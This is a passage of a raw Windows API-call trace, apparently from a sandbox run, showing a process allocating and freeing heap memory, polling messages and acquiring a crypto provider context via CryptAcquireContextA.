wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.483] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.483] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.483] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0189.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0189.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.484] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0189.484] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.484] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0189.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0189.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0189.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0189.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0189.485] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0189.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0189.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0189.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0189.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69928 [0189.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0189.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0189.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.485] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0189.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0189.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0189.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0189.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0189.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0189.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0189.486] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0189.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0189.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0189.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.491] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0189.491] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0189.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.491] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0189.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0189.492] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.492] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.493] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0189.493] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0189.493] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0189.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0189.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0189.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0189.493] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.494] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.494] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: 